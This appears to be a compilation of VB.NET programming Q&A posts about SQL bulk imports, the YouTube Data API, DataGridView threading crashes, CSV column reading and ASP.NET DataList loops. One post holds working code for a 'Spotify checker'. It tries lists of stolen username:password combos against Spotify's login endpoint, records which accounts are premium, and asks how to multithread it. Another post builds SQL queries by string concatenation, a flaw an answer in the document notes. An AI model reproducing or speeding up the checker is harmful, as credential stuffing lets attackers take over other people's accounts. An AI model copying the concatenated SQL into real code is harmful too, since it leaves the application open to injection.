Importing a very big text file into SQL: speed problem

I need to import a big text file into a SQL database.
The text file contains some 5 million rows. :D
My PC is old and I use VB.NET, but this is a one-shot job.
When the import started, the code read and inserted 100 lines per second.
That is slow, but for a one-shot job it is not a problem.
Now, with 300,000 lines read, it runs at 8 lines per second. :(
The goal is far away...
The strange thing is that if I restart from the first line with 300,000 records already in the database, the speed is fast again (100 lines/s), even though I still check that each record does not already exist.
In SQL I created a clustered index.
This is the VB.NET code in the BackgroundWorker's DoWork handler:
Private Sub Bw_DoWork(sender As Object, e As DoWorkEventArgs)
Dim d = DirectCast(e.Argument, BwData).Path
Dim s = DirectCast(e.Argument, BwData).Start
Dim reader As IO.StreamReader = My.Computer.FileSystem.OpenTextFileReader(d)
Dim l As String
Dim lineIndex As Integer = 0
Dim lineStart As Integer = 0
Dim part As String() = Nothing
Try
Using ctx = New ContentsDBEntities
Dim rowN = s 'Math.Max(ctx.xHamster.Count - 100, 1)
Do
l = reader.ReadLine
If l Is Nothing Then
Exit Do
End If
part = l.Split("|")
If Bw.CancellationPending Then Exit Do
If lineIndex >= rowN AndAlso part.Length >= 14 Then
If lineIndex = rowN Then
lineStart = lineIndex
startAt = Now
End If
Dim vId = part(0)
If IsNumeric(vId) Then
Dim there = (From c In ctx.xHamster Where c.VideoId = vId Select c).FirstOrDefault
If there Is Nothing Then
Dim r = New xHamster With {
.VideoId = vId,
.Url = part(1),
.Umbed_Url = part(2),
.Title = part(3),
.Duration = StringToSec(part(4)),
.dateAdded = Date.Parse(part(5)),
.Thumb = part(6),
.Channels = part(7),
.Pornstars = part(8),
.MaxResolution = part(9),
.Orientation = part(10),
.Title_RU = part(11),
.Username = part(12),
.Description = part(13)}
ctx.xHamster.Add(r)
If lineIndex Mod 100 = 0 Then
ctx.SaveChanges()
End If
End If
End If
End If
lineIndex += 1
DirectCast(sender, BackgroundWorker).ReportProgress(lineIndex, lineStart)
Loop Until l Is Nothing
reader.Close()
ctx.SaveChanges()
End Using
Catch ex As Exception
Debug.Print(ex.Message)
End Try
End Sub
Do you have a trick for me?
Why does the speed decrease?
Thank you
Luca
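One possible explanation, given that a restart runs fast again even with 300,000 rows already in the table, is the single long-lived context: every entity that is queried or added stays tracked, and in Entity Framework each Add normally triggers change detection over everything tracked so far, so the cost per row grows as the context fills up. Creating a fresh context for each batch is one way to test that. Another option for a one-shot load is to bypass the context and use SqlBulkCopy. The following is only a minimal sketch under assumptions: BulkImportSketch, ToTable and ImportFile are hypothetical names, the destination table and column names must match your schema, and it does no duplicate check (a unique index or a staging table would have to cover that). Values that need conversion first, such as the duration and the date, would have to be converted before being added to the row.

```vbnet
Imports System.Collections.Generic
Imports System.Data
Imports System.Data.SqlClient
Imports System.IO

Module BulkImportSketch
    ' Hypothetical helper: turns pipe-delimited lines into a DataTable with
    ' one string column per entry in columnNames. Lines with too few fields are skipped.
    Function ToTable(lines As IEnumerable(Of String), columnNames As String()) As DataTable
        Dim table As New DataTable()
        For Each columnName In columnNames
            table.Columns.Add(columnName, GetType(String))
        Next
        For Each line In lines
            Dim parts = line.Split("|"c)
            If parts.Length < columnNames.Length Then Continue For
            Dim row = table.NewRow()
            For i = 0 To columnNames.Length - 1
                row(i) = parts(i)
            Next
            table.Rows.Add(row)
        Next
        Return table
    End Function

    ' Hypothetical entry point: streams the file and sends it to the server in batches,
    ' so neither the whole file nor millions of tracked entities are held in memory.
    Sub ImportFile(filePath As String, connectionString As String,
                   destinationTable As String, columnNames As String(),
                   Optional batchSize As Integer = 10000)
        Using bulk As New SqlBulkCopy(connectionString)
            bulk.DestinationTableName = destinationTable
            For Each columnName In columnNames
                ' Assumes source and destination columns share the same names.
                bulk.ColumnMappings.Add(columnName, columnName)
            Next
            Dim batch As New List(Of String)(batchSize)
            For Each line In File.ReadLines(filePath)
                batch.Add(line)
                If batch.Count = batchSize Then
                    bulk.WriteToServer(ToTable(batch, columnNames))
                    batch.Clear()
                End If
            Next
            ' Send whatever is left after the last full batch.
            If batch.Count > 0 Then bulk.WriteToServer(ToTable(batch, columnNames))
        End Using
    End Sub
End Module
```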

Related

Get YouTube channel data using Google YouTube Data API in VB.NET

I'd like to get channel data using the YouTube Data API in a VB.NET application. I can't find any kind of documentation, everything is in .NET and the Google documentation is way too cryptic for me.
I used to get this data using URL requests, but I'd like to do it more... programmatically!
I added the Google.Apis.YouTube.v3 NuGet package, but can't figure out how to set credentials and retrieve data.
There is a VB.NET ResumableUpload example in this GitHub repository that contains some code that should help you get started.
This is some sample code that retrieves all of the videos in the "Uploads" playlist for the logged-on channel.
Imports Google.Apis.YouTube.v3
Imports Google.Apis.YouTube.v3.Data
...
...
Dim strUploadsListId As String = ""
Try
bOK = False
Dim objChannelListRequest As ChannelsResource.ListRequest = objYouTubeService.Channels.List("contentDetails")
objChannelListRequest.Mine = True
Dim objChannelListResponse As ChannelListResponse = objChannelListRequest.Execute
Dim objChannel As Channel
For Each objChannel In objChannelListResponse.Items
strUploadsListId = objChannel.ContentDetails.RelatedPlaylists.Uploads ' The Uploads PlayList
Debug.WriteLine("PlayList ID=" & strUploadsListId)
Next
bOK = True
Catch ex As Exception
MsgBox(ex.Message, MsgBoxStyle.Critical, "ChannelListRequest")
End Try
If bOK Then
Dim objNextPageToken As String = ""
While Not objNextPageToken Is Nothing
Dim objPlayListItemRequest As PlaylistItemsResource.ListRequest = objYouTubeService.PlaylistItems.List("contentDetails")
Dim objPlayListItemsListResponse As PlaylistItemListResponse = Nothing
objPlayListItemRequest.PlaylistId = strUploadsListId
objPlayListItemRequest.MaxResults = 50
objPlayListItemRequest.PageToken = objNextPageToken
Try
bOK = False
objPLayListItemsListResponse = objPlayListItemRequest.Execute
bOK = True
Catch ex As Exception
MsgBox(ex.Message, MsgBoxStyle.Critical, "PlayListRequest")
End Try
If bOK Then
Dim objPlayListItem As PlaylistItem
Dim strVideoIds As New StringBuilder("") With {.Capacity = objPLayListItemsListResponse.Items.Count * 16}
For Each objPlayListItem In objPlayListItemsListResponse.Items
strVideoIds.Append(objPlayListItem.ContentDetails.VideoId)
strVideoIds.Append(",")
Next
strVideoIds.Remove(strVideoIds.Length - 1, 1) ' Remove Last Character (Extra comma)
Dim objListRequest As VideosResource.ListRequest
Dim objVideoListResponse As VideoListResponse = Nothing
Try
bOK = False
objListRequest = New VideosResource.ListRequest(objYouTubeService, "id,snippet,recordingDetails,status,contentDetails") With {.Id = strVideoIds.ToString}
Debug.WriteLine("IDs to retrieve: " & strVideoIds.ToString)
objVideoListResponse = objListRequest.Execute
bOK = True
Catch ex As Exception
MsgBox(ex.Message, MsgBoxStyle.Critical, "ListRequest")
End Try
If bOK Then
For Each objVideo As Video In objVideoListResponse.Items
Dim TheTitle As String = objVideo.Snippet.Title
Dim Embeddable As Boolean = objVideo.Status.Embeddable
Dim dtRecorded As Date = Nothing
If (Not objVideo.RecordingDetails Is Nothing) AndAlso (Not objVideo.RecordingDetails.RecordingDate Is Nothing) Then
dtRecorded = CDate(objVideo.RecordingDetails.RecordingDate)
End If
Dim Duration As Date = GetDuration(objVideo.ContentDetails.Duration)
Dim Category As String = objVideo.Snippet.CategoryId
Dim PrivacyStatus As String = objVideo.Status.PrivacyStatus
Dim Description As String = objVideo.Snippet.Description
'
'
Next
End If
End If
objNextPageToken = objPlayListItemsListResponse.NextPageToken
End While
End If
'_______________________________________________________
Friend Function GetDuration(ByVal Duration As String) As Date ' Only an elapsed time value
' Format returned from YouTube: PT#H#M#S or PT#M#S or PT#S
GetDuration = EMPTYDATE
If Duration IsNot Nothing Then
If Duration.StartsWith("PT") Then
Dim x As Integer = 2
Dim y As Integer = x
Dim Hours As Integer = 0
Dim Minutes As Integer = 0
Dim Seconds As Integer = 0
Do
While y < Duration.Length AndAlso IsNumeric(Duration.Substring(y, 1))
y += 1
End While
If y < Duration.Length Then
Select Case Duration.Substring(y, 1)
Case "H"
Hours = CInt(Duration.Substring(x, y - x))
Case "M"
Minutes = CInt(Duration.Substring(x, y - x))
Case "S"
Seconds = CInt(Duration.Substring(x, y - x))
End Select
End If
x = y + 1
y = x
Loop Until x >= Duration.Length
GetDuration = CDate("01/01/1900 " & Format(Hours, "00") & ":" & Format(Minutes, "00") & ":" & Format(Seconds, "00"))
End If
End If
End Function
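As an alternative to hand-parsing, the PT#H#M#S format noted in the comment above is an ISO 8601 duration, which XmlConvert.ToTimeSpan in System.Xml can parse directly into a TimeSpan. A minimal sketch (the module name and the sample value are only for illustration):

```vbnet
Imports System
Imports System.Xml

Module DurationSketch
    Sub Main()
        ' "PT1H2M3S" is a made-up sample in the same shape YouTube returns.
        Dim elapsed As TimeSpan = XmlConvert.ToTimeSpan("PT1H2M3S")
        Console.WriteLine(elapsed)   ' prints 01:02:03
    End Sub
End Module
```

A TimeSpan also avoids storing an elapsed time inside a Date with a placeholder day.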
I did it, thanks to Mike Meinz and the Visual Studio debugging tools.
Here is the code to get data for some channels (not necessarily yours) using the YouTube Data API in VB.NET:
Dim youtube_api_key As String = "Your_Key"
Dim youtube_api_application_name As String = "Your_Project_Name_In_the_Google_Developper_Console"
Dim youtube_initialiser As New Google.Apis.Services.BaseClientService.Initializer()
youtube_initialiser.ApiKey = youtube_api_key
youtube_initialiser.ApplicationName = youtube_api_application_name
Dim youtube_service As Google.Apis.YouTube.v3.YouTubeService = New YouTubeService(youtube_initialiser)
Dim objChannelListRequest As ChannelsResource.ListRequest = youtube_service.Channels.List("id,snippet,statistics")
objChannelListRequest.Id = youtube_channel
Dim objChannelListResponse As ChannelListResponse = objChannelListRequest.Execute()
Debug.Print(objChannelListResponse.Items(0).Snippet.Description)
Debug.Print(objChannelListResponse.Items(0).Statistics.SubscriberCount)
Debug.Print(objChannelListResponse.Items(0).Statistics.VideoCount)
Debug.Print(objChannelListResponse.Items(0).Statistics.ViewCount)

Adding rows to a DataGridView control causes crash but only on second attempt

I have a DataGridView (dgvNew) that is populated from a JSON file located by a FileSystemWatcher; data is added row by row after being read. It works fine on the first file. But if I trigger a new file by copying and pasting the same JSON file, it adds the rows again row by row as I'd expect, but then the whole form crashes with no error.
I've tried Try...Catch with While loops for opening the files, which works in terms of opening them and adding rows; I just don't understand why it crashes. The code continues to step through regardless, even though the form is frozen. Is it thread related?
Public Sub subParseJSONs(strFilePath As String, strDesiredField As String)
Dim json As String
Dim strMachine As String
Dim read As New Newtonsoft.Json.Linq.JObject
Dim booErrorJSNOArrRead As Boolean
Dim i As Integer
Dim dgvIndex As Integer
Dim booOpened As Boolean
Dim k As Integer, j As Integer
booOpened = False
k = 1
j = 1
json = Nothing
While json Is Nothing
Try
j = j + 1
If j = 10 Then
MessageBox.Show("J integer reached 10")
Exit While
Exit Try
End If
json = Replace(Replace(System.IO.File.ReadAllText(strFilePath), vbLf, ""), vbTab, "")
read = Newtonsoft.Json.Linq.JObject.Parse(json)
Catch ex As IOException
'MessageBox.Show(ex.Message)
Threading.Thread.Sleep(300)
'GoTo EndOfSUb
Catch ex As Exception
'MessageBox.Show(ex.Message)
Threading.Thread.Sleep(300)
'GoTo EndOfSUb
Finally
booOpened = True
End Try
End While
booErrorJSNOArrRead = False
i = 0
dgvNew.ColumnCount = 6
dgvNew.Columns(0).Name = "TempID"
dgvNew.Columns(1).Name = "DriverName"
dgvNew.Columns(2).Name = "Seat"
dgvNew.Columns(3).Name = "RaceTime"
dgvNew.Columns(4).Name = "ResultTime"
dgvNew.Columns(5).Name = "CarDriven"
dgvNew.RefreshEdit()
dgvNew.Refresh()
Do Until i = read.Item("Result").Count
If Not read.Item("Result")(i)("DriverName") = "" Then
Dim milliseconds As Double = Convert.ToDouble(read.Item("Result")(i)("TotalTime"))
Dim ts As TimeSpan = TimeSpan.FromMilliseconds(milliseconds)
Dim strMMSSmmm As String = ts.Minutes.ToString & ":" & ts.Seconds.ToString & "." & ts.Milliseconds.ToString
Dim row As String() = New String() {i + 1,
read.Item("Result")(i)("DriverName"),
read.Item("Result")(i)("DriverName"),
strMMSSmmm,
DateTime.Now, read.Item("Result")(i)("CarModel")}
dgvNew.Rows.Add(row)
End If
i = i + 1
Loop
read = Nothing
End Sub
I'm expecting new rows to be added to the bottom of dgvNew, which they are, but then it crashes.
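On the threading question: FileSystemWatcher raises its events on a thread-pool thread unless its SynchronizingObject property is set, and WinForms controls such as a DataGridView should only be touched from the UI thread, so a frozen form with no exception is at least consistent with a cross-thread update. This is a possible cause, not a confirmed diagnosis. A minimal sketch of marshalling the update back to the UI thread, where WatcherForm, OnFileCreated and AddRow are hypothetical names and the JSON parsing is left out:

```vbnet
Imports System
Imports System.IO
Imports System.Windows.Forms

Public Class WatcherForm
    Inherits Form

    Private ReadOnly dgvNew As New DataGridView() With {.Dock = DockStyle.Fill}
    Private ReadOnly watcher As New FileSystemWatcher()

    Public Sub New(folder As String)
        Controls.Add(dgvNew)
        dgvNew.ColumnCount = 1
        dgvNew.Columns(0).Name = "FileName"
        watcher.Path = folder
        watcher.Filter = "*.json"
        AddHandler watcher.Created, AddressOf OnFileCreated
    End Sub

    Protected Overrides Sub OnLoad(e As EventArgs)
        MyBase.OnLoad(e)
        ' Start watching only once the form's window handle exists.
        watcher.EnableRaisingEvents = True
    End Sub

    Private Sub OnFileCreated(sender As Object, e As FileSystemEventArgs)
        ' This handler runs on a thread-pool thread, so queue the grid update on the UI thread.
        BeginInvoke(New Action(Sub() AddRow(e.Name)))
    End Sub

    Private Sub AddRow(fileName As String)
        ' Runs on the UI thread; safe to touch the grid here.
        dgvNew.Rows.Add(New Object() {fileName})
    End Sub

    Protected Overrides Sub OnFormClosed(e As FormClosedEventArgs)
        ' Stop the watcher before the form goes away.
        watcher.Dispose()
        MyBase.OnFormClosed(e)
    End Sub
End Class
```

Setting watcher.SynchronizingObject = Me in the constructor is an alternative that makes the watcher itself raise its events on the UI thread.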

Multithreading and splitting the workload

So I created a Spotify checker to check a list of accounts for their logins and current subscription. This works fine, but it only runs on one thread, and that, in my opinion, is really slow. So I started searching around for multithreading (I am pretty new to VB.NET and am trying to learn this way). But everything I threw at it would just run all threads separately on the same accounts without any difference in results, except that they were printed out multiple times.
The code for the sub Login:
Public Sub Login()
Dim index As Integer = 0
While index < Combos.Count
Dim str() As String = Combos(index).Split(":")
Using req As New HttpRequest
req.UserAgent = Http.ChromeUserAgent
req.Cookies = New CookieDictionary()
req.Proxy = Nothing
req.IgnoreProtocolErrors = True
req.Get("https://accounts.spotify.com/en-US/login?continue=https:%2F%2Fwww.spotify.com%2Fus%2Faccount%2Foverview%2F")
Dim token As String = req.Cookies.ToString
Dim csrf As String = Regex.Match(token, "csrf_token=(\S+)").Groups(1).ToString
req.Referer = "https://accounts.spotify.com/en-US/login?continue=https:%2F%2Fwww.spotify.com%2Fus%2Faccount%2Foverview%2F"
req.AddHeader("Cookie", "csrf_token=" + csrf + "; __bon=MHwwfDQ1MzY4Nzk4M3wxOTA1NDg5NTI4NnwxfDF8MXwx; fb_continue=https%3A%2F%2Fwww.spotify.com%2Fus%2Faccount%2Foverview%2F; remember=false")
req.AddParam("remember", "false")
req.AddParam("username", str(0))
req.AddParam("password", str(1))
req.AddParam("captcha_token", "")
req.AddParam("csrf_token", csrf)
Dim respo As String = req.Post("https://accounts.spotify.com/api/login").ToString
If respo.Contains("displayName") Then
Dim IT As New ListViewItem
IT.Text = str(0)
IT.SubItems.Add(str(1))
Dim html As String = req.Post("https://spotify.com/account/subscription/").ToString
Dim Info As Match = Regex.Match(html, "<h3.*>(.*)<\/h3>")
Dim Type As String = Info.Groups(1).Value
If Type.Contains("Spotify Premium") Then
IT.SubItems.Add("Spotify Premium")
ListView1.Items.Add(IT)
Label3.Text += 1
Label1.Text += 1
ElseIf Type.Contains("Premium for Family") Then
IT.SubItems.Add("Spotify Premium for Family")
ListView1.Items.Add(IT)
Label3.Text += 1
Label1.Text += 1
Else
If StrafeCheckBox1.Checked = False Then
Label2.Text += 1
Else
IT.SubItems.Add("Free")
ListView1.Items.Add(IT)
Label1.Text += 1
End If
End If
Else
Label2.Text += 1
End If
End Using
index += 1
StrafeProgressBar1.Value = index
If index = Combos.Count Then
MsgBox("Done, successfull logins: " + Label1.Text)
End If
End While
End Sub
Code for the start button:
Private Sub LoginBTN_Click(sender As Object, e As EventArgs) Handles StartBTN.Click
Dim IH As New Thread(AddressOf Login) : IH.Start()
StrafeProgressBar1.Maximum = Combos.Count
End Sub
So what I basically want to know is how to get the threads to split the workload evenly and finish the job a lot quicker.
All help is appreciated.

Only read certain columns from a CSV

I have a CSV file that has extra commas in it. I know I won't ever need anything after a specific column: any information after column 12 I won't need. I don't have a say in how the CSV looks when it gets to me, so I can't change it there. I was wondering if there is a way to read just the first 12 columns and ignore the rest of the CSV file.
This is what the code looks like now.
Thank you for any help.
Private Sub GetData(ByVal Path As String, ByRef DG As DataGridView, Optional ByVal NoHeader As Boolean = False)
Dim Fields(100) As String
Dim Start As Integer = 1
If NoHeader Then Start = 0
If Not File.Exists(Path) Then
Return
End If
Dim Lines() As String = File.ReadAllLines(Path)
Lines(0) = Lines(0).Replace(Chr(34), "")
Fields = Lines(0).Split(",")
If NoHeader Then
For I = 1 To Fields.Count - 1
Fields(I) = Str(I)
Next
End If
dt = New DataTable()
For Each Header As String In Fields
dt.Columns.Add(New DataColumn(Header.Trim()))
Dim desiredSize As Integer = 11
While dt.Columns.Count > desiredSize
dt.Columns.RemoveAt(desiredSize)
End While
Next
For I = Start To Lines.Count - 1
Lines(I) = Lines(I).Replace(Chr(34), "")
Fields = Lines(I).Split(",")
Dim dr As DataRow = dt.Rows.Add()
For j = 0 To Fields.Count - 1
dr(j) = Fields(j).Trim()
Next
Next
DG.DataSource = dt
End Sub
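Really, all you need to do is change the bound of the For loop at the bottom that iterates through Fields: replace For j = 0 To Fields.Count - 1 with For j = 0 To 11. Note that dt must then actually have 12 columns (the code above trims it to desiredSize = 11, so set desiredSize to 12), and a line with fewer than 12 fields would still throw. For j = 0 To Math.Min(Fields.Count, dt.Columns.Count) - 1 covers both cases.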
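The same idea can also be applied when splitting, so the extra fields never reach the loop. A minimal sketch, assuming a plain comma split is acceptable as in the question's code (FirstFields and the sample line are hypothetical):

```vbnet
Imports System
Imports System.Linq

Module CsvColumnsSketch
    ' Hypothetical helper: strips double quotes, splits on commas and
    ' returns at most maxColumns trimmed fields from one CSV line.
    Function FirstFields(line As String, maxColumns As Integer) As String()
        Return line.Replace("""", "").
                    Split(","c).
                    Take(maxColumns).
                    Select(Function(field) field.Trim()).
                    ToArray()
    End Function

    Sub Main()
        ' Made-up sample line with trailing extra commas.
        Dim fields = FirstFields("a, b ,c,,,extra,,", 3)
        Console.WriteLine(String.Join("|", fields))   ' prints a|b|c
    End Sub
End Module
```

Because Take never returns more than the line contains, a short line simply yields fewer fields instead of throwing.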

Loop through data in a DataList

How do I loop through each item in the DataList? I am currently getting one value from "Label8", which causes my "Label7" to show "No" for all.
Protected Sub DataList2_ItemDataBound(ByVal sender As Object, ByVal e As System.Web.UI.WebControls.DataListItemEventArgs) Handles DataList2.ItemDataBound
For Each li As DataListItem In DataList2.Items
Dim labelasd As Label = DirectCast(e.Item.FindControl("Label8"), Label)
Dim reviewid As Integer = labelasd.Text
Dim connectionString As String = _
ConfigurationManager.ConnectionStrings("ConnectionString").ConnectionString
Dim connection As SqlConnection = New SqlConnection(connectionString)
connection.Open()
Dim sql As String = "Select Count(reviewYes) AS Expr1 From ProductReviewHelp Where ProductReviewID = " & reviewid & ""
Dim command As SqlCommand = New SqlCommand(sql, connection)
Dim reader As SqlDataReader = command.ExecuteReader()
Dim countofreview As Integer = 0
Dim reviewcountboolean As Boolean
If (reader.Read()) Then
If (IsDBNull(reader.GetValue(0)) = False) Then
countofreview = reader.GetValue(0)
End If
End If
If countofreview = 0 Then
reviewcountboolean = False
Else
reviewcountboolean = True
End If
If (reviewcountboolean = True) Then
Dim label1 As Label = DirectCast(e.Item.FindControl("Label7"), Label)
label1.Text = "Hello"
ElseIf (reviewcountboolean = False) Then
Dim label1 As Label = DirectCast(e.Item.FindControl("Label7"), Label)
label1.Text = "No"
End If
Next
End Sub
You are looping over your DataList2 items but, on every iteration, you update Label7 with the logic of the current item, effectively overwriting the result of the previous iteration. This means that, when you reach the last item, Label7 will show "Hello" or "No" depending on the logic applied to the last item in your loop.
Apart from this logical error, there are several other errors in the code shown:
The connection is never closed.
You use string concatenation instead of parameters.
You use ExecuteReader when in this case ExecuteScalar is better suited.
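The three points above can be sketched as follows. Since ItemDataBound is raised once for each item as it is bound, one option is to drop the For Each entirely and work only on e.Item. This is a sketch under assumptions, not a drop-in replacement: the class name ProductReviewsPage is hypothetical, DataList2 is assumed to be declared in the page markup, and the table, column and connection string names are taken from the question.

```vbnet
Imports System
Imports System.Configuration
Imports System.Data
Imports System.Data.SqlClient
Imports System.Web.UI.WebControls

' Hypothetical code-behind class; DataList2 itself comes from the page markup.
Partial Class ProductReviewsPage
    Inherits System.Web.UI.Page

    Protected Sub DataList2_ItemDataBound(sender As Object, e As DataListItemEventArgs) Handles DataList2.ItemDataBound
        ' Headers, footers and separators have no Label8/Label7, so skip them.
        If e.Item.ItemType <> ListItemType.Item AndAlso
           e.Item.ItemType <> ListItemType.AlternatingItem Then Return

        Dim idLabel = DirectCast(e.Item.FindControl("Label8"), Label)
        Dim resultLabel = DirectCast(e.Item.FindControl("Label7"), Label)

        Dim reviewId As Integer
        If Not Integer.TryParse(idLabel.Text, reviewId) Then Return

        Dim connectionString = ConfigurationManager.ConnectionStrings("ConnectionString").ConnectionString
        Const sql As String = "SELECT COUNT(reviewYes) FROM ProductReviewHelp WHERE ProductReviewID = @id"

        ' Using blocks close the connection even if the query throws.
        Using connection As New SqlConnection(connectionString)
            Using command As New SqlCommand(sql, connection)
                ' A parameter replaces the string concatenation.
                command.Parameters.Add("@id", SqlDbType.Int).Value = reviewId
                connection.Open()
                ' COUNT returns a single value, so ExecuteScalar is enough.
                Dim reviewCount = Convert.ToInt32(command.ExecuteScalar())
                resultLabel.Text = If(reviewCount > 0, "Hello", "No")
            End Using
        End Using
    End Sub
End Class
```

This still runs one query per item; for long lists, computing the counts in the query that feeds the DataList would avoid that.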
You can iterate through them using a loop. Here is an example:
Try
readFromDL1 = DirectCast(SqlDataSource1.Select(DataSourceSelectArguments.Empty), DataView)
readFromQ = DirectCast(SqlDataSource7.Select(DataSourceSelectArguments.Empty), DataView)
Catch ex As Exception
End Try
'End
'datalist1
i = 0
_rowCount = DataList1.Items.Count
If _rowCount > 0 Then
_getCall = DataList1.Items.Item(i).FindControl("lnkEdit")
End If
For Each readr As DataRowView In readFromQ
findQNumber = readr(1).ToString()
For Each readfdlr1 As DataRowView In readFromDL1
findQNumber1 = readfdlr1(1).ToString
Try
indexofitems = DataList1.Items.Item(i1).ItemIndex
If findQNumber.ToString = findQNumber1.ToString Then
_getCall = DataList1.Items.Item(indexofitems).FindControl("lnkEdit")
_getCall.Text = "Called"
_getCall.Enabled = False
_getCall.ForeColor = Drawing.Color.Red
_getCall.BackColor = Drawing.Color.Yellow
End If
i1 = i1 + 1
Catch e As Exception
End Try
Next
i1 = 0
i = i + 1